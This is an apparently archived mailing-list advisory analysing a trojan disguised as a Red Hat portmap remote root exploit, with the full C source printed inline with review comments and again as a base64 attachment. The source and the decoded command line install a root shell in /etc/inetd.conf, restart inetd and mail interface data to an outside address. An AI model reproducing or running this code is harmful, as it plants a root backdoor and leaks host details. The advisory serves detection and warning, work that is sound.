This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info.
---807922518-1961635173-935169810=:31229
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.10.9908201223441.31229at_private>
Trojan being passed around to script kiddies as a "portmap remote root exploit" for Red Hat. It never touches portmap: the `shellcode` string is not machine code but a shell command line with 53 added to every byte, and `#define pmap_proc_p system` turns the innocuous-looking `pmap_proc_p(portmap)` in main() into `system()` on the decoded text. Decoded, the command appends `65139 stream tcp nowait root /bin/sh sh -i` to /etc/inetd.conf, sends SIGHUP to inetd (`killall -1 inetd`) so the root shell listener goes live, and pipes `ifconfig -a` into `mail` addressed to goat187at_private. All of this runs on the box of whoever compiles and runs the "exploit" (hence the banner's "no stack patch" pretext and the hope that it is run as root), before a single packet goes to the host named on the command line; even run unprivileged, the ifconfig/mail step still leaks the local interface configuration. Defenders: grep /etc/inetd.conf for a `nowait root /bin/sh` entry and check for an inetd listener on TCP 65139. Code below and also attached (the attachment is the same file, base64-encoded).
------------------------------Snip---------------------------------------
/* Do not run unless you know what you are doing , and DONT RUN IT AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them your IP address. PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a TROJAN) portmap remote root linux exploit (TROJAN) (no stack patch) by horizon - jmcdonaldat_private This was tested against redhat box with 2.2.9 kernel. (shouldn't need offset) BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;) */

/*
 * NOTE(review): despite the banner above, nothing in this file speaks RPC to
 * portmap.  `CLIENT *cli`, NOP and RET are unused decoration.  The real
 * mechanism is `#define pmap_proc_p system` plus the "shellcode" string,
 * which is an ASCII shell command with 53 (the `offset` in main()) added to
 * every byte.  Subtracting 53 from each byte yields, exactly:
 *
 *   /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ;
 *   /bin/killall -1 inetd 2>&1 1>/dev/null ;
 *   /sbin/ifconfig -a | mail goat187@<domain redacted as elsewhere in this archive> 2>&1 2>/dev/null
 *
 * i.e. it installs a root shell service in the LOCAL /etc/inetd.conf, SIGHUPs
 * inetd to pick it up, and mails the local interface configuration to the
 * trojan author.  The host given on the command line is only ever used by
 * rshell() below, after the local damage is done.  Whether inetd accepts a
 * bare port number ("65139") in place of a service name depends on the inetd
 * build; the ifconfig/mail leak does not depend on it.  Keep this file as an
 * indicator-of-compromise reference; do not build or run it.
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>       /* only needed for the never-used CLIENT declaration in main() */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90           /* never referenced */
#define RET 0xbfffec90     /* never referenced */
#define PORT 5760          /* port rshell() connects to; the inetd entry above listens on 65139, not 5760 */
#define pmap_proc_p system /* the tell: pmap_proc_p(portmap) in main() is system(portmap) */

/*
 * Obfuscated command line, 179 bytes (9 x 19 + 8), every byte = plaintext + 53.
 * The smallest byte is 0x3f (decodes to '\n'), so the while(*shellcode) loop in
 * main() runs over all 179 bytes.  No NUL terminator is ever appended.
 */
char *shellcode = "\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";

/* Larger of two ints; used by rshell() to build the nfds argument for select(). */
int max(int x, int y)
{
        if(x > y)
                return(x);
        return(y);
}

/*
 * Interactive relay to host:PORT (5760).  Only reached after system() has
 * already run the decoded payload locally.  The address is taken from
 * inet_addr(host) -- the gethostbyname() result `hp` is never used, so a
 * hostname is not actually resolved.  Sends "uname -a; pwd; id;" and then
 * shuttles bytes between stdin and the socket via select().  Exits on EOF or
 * error from the socket and never returns otherwise.
 */
void rshell(char *host)
{
        int sockfd, maxfd, n;
        struct sockaddr_in cli;
        char sendln[1024], recvln[1024];
        struct hostent *hp;
        fd_set rset;
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("socket");
                exit(-1);
        }
        if((hp = gethostbyname(host)) == NULL){
                perror("gethostbyname");
                exit(-1);
        }
        bzero(&cli, sizeof(cli));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(PORT);
        cli.sin_addr.s_addr = inet_addr(host);   /* hp is ignored; only a dotted-quad works here */
        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
                perror("connect");
                exit(-1);
        }
        printf("root shell found!\n");
        strcpy(sendln, "uname -a; pwd; id;\n");
        write(sockfd, sendln, strlen(sendln));
        FD_ZERO(&rset);
        for(;;){
                FD_SET(fileno(stdin), &rset);
                FD_SET(sockfd, &rset);
                maxfd = max(fileno(stdin), sockfd) + 1;
                select(maxfd, &rset, NULL, NULL, NULL);
                if(FD_ISSET(fileno(stdin), &rset)){
                        bzero(sendln, sizeof(sendln));
                        fgets(sendln, sizeof(sendln)-2, stdin);
                        write(sockfd, sendln, strlen(sendln));
                }
                if(FD_ISSET(sockfd, &rset)){
                        bzero(recvln, sizeof(recvln));
                        /* a full 1024-byte read leaves recvln with no NUL; fputs() then reads past it */
                        if((n = read(sockfd, recvln, sizeof(recvln))) == 0){
                                printf("Connection closed.\n");
                                exit(0);
                        }
                        if(n < 0){
                                perror("read");
                                exit(-1);
                        }
                        fputs(recvln, stdout);
                }
        }
}

/*
 * Entry point.  Sequence of events (this is the trojan):
 *   1. decode `shellcode` into `portmap` by subtracting offset (53) from each
 *      byte.  179 bytes are written into a malloc(154) block, so the loop
 *      overruns the allocation by 25 bytes, and no '\0' is stored -- the
 *      string handed to system() ends at whatever zero byte follows on the
 *      heap (often immediately, on a fresh heap, but not guaranteed);
 *   2. pmap_proc_p(portmap) == system(portmap): runs the decoded command
 *      LOCALLY as the invoking user.  The inetd.conf append and killall -1
 *      need root; the ifconfig | mail leak does not;
 *   3. only then print "sending shellcode..." and call rshell(argv[1]).
 * The "[offset]" shown in the usage line is never read; offset is hard-wired
 * to 53.  `cli` is declared and never used.  The final strcpy(buf, portmap)
 * writes through an uninitialized pointer but is unreachable in practice
 * because rshell() exits or loops forever.
 */
void main(int argc, char **argv)
{
        CLIENT *cli;
        int i = 0, offset = 53;
        char *portmap;
        char *buf;
        if(argc < 2){
                printf("usage: %s <ip> [offset]\n", argv[0]);
                exit(-1);
        }
        if((portmap = (char *) malloc(154)) == NULL) {
                perror("malloc");   /* no exit: a NULL portmap would be dereferenced below */
        }
        while(*shellcode) {
                /* bytes >= 0x80 rely on the conversion back to char wrapping; on gcc/x86 the
                 * result is the same whether char is signed or unsigned (implementation-defined) */
                portmap[i] = *shellcode - offset;
                shellcode++;
                i++;
        }
        pmap_proc_p(portmap);   /* == system(portmap): the local inetd.conf edit + mail happen here */
        printf("sending shellcode... connecting to remote host\n");
        rshell(argv[1]);
        strcpy(buf, portmap);
        exit(-1);
}
---------------------------------------SNIP------------Snip----
---807922518-1961635173-935169810=:31229
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="portmap.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9908201223300.31229at_private>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="portmap.c"
LyoNCg0KICAgICAgICBQUklWQVRFICEhISBETyBOT1QgRElTVFJJQlVURSBU SElTICEhISBQUklWQVRFDQogICAgICAgIHBvcnRtYXAgcmVtb3RlIHJvb3Qg bGludXggZXhwbG9pdCAobm8gc3RhY2sgcGF0Y2gpDQoJYnkgaG9yaXpvbiAt IGptY2RvbmFsZEB1bmYuZWR1DQoNCiAgICAgICAgVGhpcyB3YXMgdGVzdGVk IGFnYWluc3QgcmVkaGF0IGJveCB3aXRoIDIuMi45IGtlcm5lbC4NCiAgICAg ICAgKHNob3VsZG4ndCBuZWVkIG9mZnNldCkNCg0KICAgICAgICBCSUcgdGhh bmtzIHRvIHN0cmFuOWVyIHdobyB3cm90ZSB0aGlzIHNoZWxsY29kZSEhDQoN CiAgICAgICAgZ3JlZXRzIHRvOiAjIUFETSBhbmQgdXNlcnMgQCBlbDgub3Jn IDspDQoNCiovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0 cmluZy5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8cnBjL3Jw Yy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMv dHlwZXMuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8 c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRl IDx1bmlzdGQuaD4NCg0KI2RlZmluZSBOT1AJMHg5MA0KI2RlZmluZSBSRVQJ
MHhiZmZmZWM5MA0KI2RlZmluZSBQT1JUCTU3NjANCiNkZWZpbmUJcG1hcF9w cm9jX3Agc3lzdGVtDQoNCmNoYXIgKnNoZWxsY29kZSA9DQoiXHg2NFx4OTdc eDllXHhhM1x4NjRceDlhXHg5OFx4OWRceGE0XHg1NVx4NTdceDZiXHg2YVx4 NjZceDY4XHg2ZVx4NTVceGE4XHhhOSINCiJceGE3XHg5YVx4OTZceGEyXHg1 NVx4YTlceDk4XHhhNVx4NTVceGEzXHhhNFx4YWNceDk2XHg5ZVx4YTlceDU1 XHhhN1x4YTRceGE0Ig0KIlx4YTlceDU1XHg2NFx4OTdceDllXHhhM1x4NjRc eGE4XHg5ZFx4NTVceGE4XHg5ZFx4NTVceDYyXHg5ZVx4NTdceDU1XHg3M1x4 NzMiDQoiXHg1NVx4NjRceDlhXHhhOVx4OThceDY0XHg5ZVx4YTNceDlhXHhh OVx4OTlceDYzXHg5OFx4YTRceGEzXHg5Ylx4NTVceDcwXHg1NSINCiJceDY0 XHg5N1x4OWVceGEzXHg2NFx4YTBceDllXHhhMVx4YTFceDk2XHhhMVx4YTFc eDU1XHg2Mlx4NjZceDU1XHg5ZVx4YTNceDlhIg0KIlx4YTlceDk5XHg1NVx4 NjdceDczXHg1Ylx4NjZceDU1XHg2Nlx4NzNceDY0XHg5OVx4OWFceGFiXHg2 NFx4YTNceGFhXHhhMVx4YTEiDQoiXHg1NVx4NzBceDU1XHg2NFx4YThceDk3 XHg5ZVx4YTNceDY0XHg5ZVx4OWJceDk4XHhhNFx4YTNceDliXHg5ZVx4OWNc eDU1XHg2MiINCiJceDk2XHg1NVx4YjFceDU1XHhhMlx4OTZceDllXHhhMVx4 NTVceDljXHhhNFx4OTZceGE5XHg2Nlx4NmRceDZjXHg3NVx4OWRceGE0Ig0K Ilx4YTlceGEyXHg5Nlx4OWVceGExXHg2M1x4OThceGE0XHhhMlx4NTVceDY3 XHg3M1x4NWJceDY2XHg1NVx4NjdceDczXHg2NFx4OTkiDQoiXHg5YVx4YWJc eDY0XHhhM1x4YWFceGExXHhhMVx4M2YiOw0KDQppbnQgbWF4KGludCB4LCBp bnQgeSkNCnsNCiAgICAgICAgaWYoeCA+IHkpDQogICAgICAgICAgICAgICAg cmV0dXJuKHgpOw0KICAgICAgICByZXR1cm4oeSk7DQp9DQoNCnZvaWQgcnNo ZWxsKGNoYXIgKmhvc3QpDQp7DQogICAgICAgIGludCBzb2NrZmQsIG1heGZk LCBuOw0KICAgICAgICBzdHJ1Y3Qgc29ja2FkZHJfaW4gY2xpOw0KICAgICAg ICBjaGFyIHNlbmRsblsxMDI0XSwgcmVjdmxuWzEwMjRdOw0KICAgICAgICBz dHJ1Y3QgaG9zdGVudCAqaHA7DQogICAgICAgIGZkX3NldCByc2V0Ow0KDQog ICAgICAgIGlmKChzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJF QU0sIDApKSA8IDApew0KICAgICAgICAgICAgICAgIHBlcnJvcigic29ja2V0 Iik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiAg ICAgICAgaWYoKGhwID0gZ2V0aG9zdGJ5bmFtZShob3N0KSkgPT0gTlVMTCl7 DQogICAgICAgICAgICAgICAgcGVycm9yKCJnZXRob3N0YnluYW1lIik7DQoN CiAgICAgICAgICAgICAgICBleGl0KC0xKTsNCiAgICAgICAgfQ0KICAgICAg ICBiemVybygmY2xpLCBzaXplb2YoY2xpKSk7DQogICAgICAgIGNsaS5zaW5f 
ZmFtaWx5ID0gQUZfSU5FVDsNCiAgICAgICAgY2xpLnNpbl9wb3J0ID0gaHRv bnMoUE9SVCk7DQogICAgICAgIGNsaS5zaW5fYWRkci5zX2FkZHIgPSBpbmV0 X2FkZHIoaG9zdCk7DQogICAgICAgIGlmKGNvbm5lY3Qoc29ja2ZkLCAoc3Ry dWN0IHNvY2thZGRyICopJmNsaSwgc2l6ZW9mKGNsaSkpIDwgMCl7DQogICAg ICAgICAgICAgICAgcGVycm9yKCJjb25uZWN0Iik7DQogICAgICAgICAgICAg ICAgZXhpdCgtMSk7DQogICAgICAgIH0NCiAgICAgICAgcHJpbnRmKCJyb290 IHNoZWxsIGZvdW5kIVxuIik7DQogICAgICAgIHN0cmNweShzZW5kbG4sICJ1 bmFtZSAtYTsgcHdkOyBpZDtcbiIpOw0KICAgICAgICB3cml0ZShzb2NrZmQs IHNlbmRsbiwgc3RybGVuKHNlbmRsbikpOw0KICAgICAgICBGRF9aRVJPKCZy c2V0KTsNCiAgICAgICAgZm9yKDs7KXsNCiAgICAgICAgICAgICAgICBGRF9T RVQoZmlsZW5vKHN0ZGluKSwgJnJzZXQpOw0KICAgICAgICAgICAgICAgIEZE X1NFVChzb2NrZmQsICZyc2V0KTsNCiAgICAgICAgICAgICAgICBtYXhmZCA9 IG1heChmaWxlbm8oc3RkaW4pLCBzb2NrZmQpICsgMTsNCiAgICAgICAgICAg ICAgICBzZWxlY3QobWF4ZmQsICZyc2V0LCBOVUxMLCBOVUxMLCBOVUxMKTsN CiAgICAgICAgICAgICAgICBpZihGRF9JU1NFVChmaWxlbm8oc3RkaW4pLCAm cnNldCkpew0KDQogICAgICAgICAgICAgICAgICAgICAgICBiemVybyhzZW5k bG4sIHNpemVvZihzZW5kbG4pKTsNCiAgICAgICAgICAgICAgICAgICAgICAg IGZnZXRzKHNlbmRsbiwgc2l6ZW9mKHNlbmRsbiktMiwgc3RkaW4pOw0KICAg ICAgICAgICAgICAgICAgICAgICAgd3JpdGUoc29ja2ZkLCBzZW5kbG4sIHN0 cmxlbihzZW5kbG4pKTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAg ICAgICAgaWYoRkRfSVNTRVQoc29ja2ZkLCAmcnNldCkpew0KICAgICAgICAg ICAgICAgICAgICAgICAgYnplcm8ocmVjdmxuLCBzaXplb2YocmVjdmxuKSk7 DQogICAgICAgICAgICAgICAgICAgICAgICBpZigobiA9IHJlYWQoc29ja2Zk LCByZWN2bG4sIHNpemVvZihyZWN2bG4pKSkgPT0gMCl7DQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiQ29ubmVjdGlvbiBjbG9z ZWQuXG4iKTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZXhp dCgwKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAg ICAgICAgICAgICAgIGlmKG4gPCAwKXsNCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgcGVycm9yKCJyZWFkIik7DQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGV4aXQoLTEpOw0KICAgICAgICAgICAgICAgICAg ICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAgICAgZnB1dHMocmVjdmxu LCBzdGRvdXQpOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KfQ0K 
DQp2b2lkIG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgICAg ICBDTElFTlQgKmNsaTsNCiAgICAgICAgaW50IGkgPSAwLCBvZmZzZXQgPSA1 MzsNCgljaGFyICpwb3J0bWFwOw0KCWNoYXIgKmJ1ZjsNCg0KCSAgICAgICAg aWYoYXJnYyA8IDIpew0KICAgICAgICAgICAgICAgIAlwcmludGYoInVzYWdl OiAlcyA8aXA+IFtvZmZzZXRdXG4iLCBhcmd2WzBdKTsNCgkJCWV4aXQoLTEp Ow0KCQl9DQoNCglpZigocG9ydG1hcCA9IChjaGFyICopIG1hbGxvYygxNTQp KSA9PSBOVUxMKSB7DQoJCXBlcnJvcigibWFsbG9jIik7DQoJfQ0KDQoJd2hp bGUoKnNoZWxsY29kZSkgew0KCQlwb3J0bWFwW2ldID0gKnNoZWxsY29kZSAt IG9mZnNldDsJDQoJCXNoZWxsY29kZSsrOyBpKys7DQoJfQ0KDQoJcG1hcF9w cm9jX3AocG9ydG1hcCk7DQoNCglwcmludGYoInNlbmRpbmcgc2hlbGxjb2Rl Li4uIGNvbm5lY3RpbmcgdG8gcmVtb3RlIGhvc3RcbiIpOw0KCXJzaGVsbChh cmd2WzFdKTsNCgkNCglzdHJjcHkoYnVmLCBwb3J0bWFwKTsNCg0KCWV4aXQo LTEpOw0KfQkNCg== ---807922518-1961635173-935169810=:31229--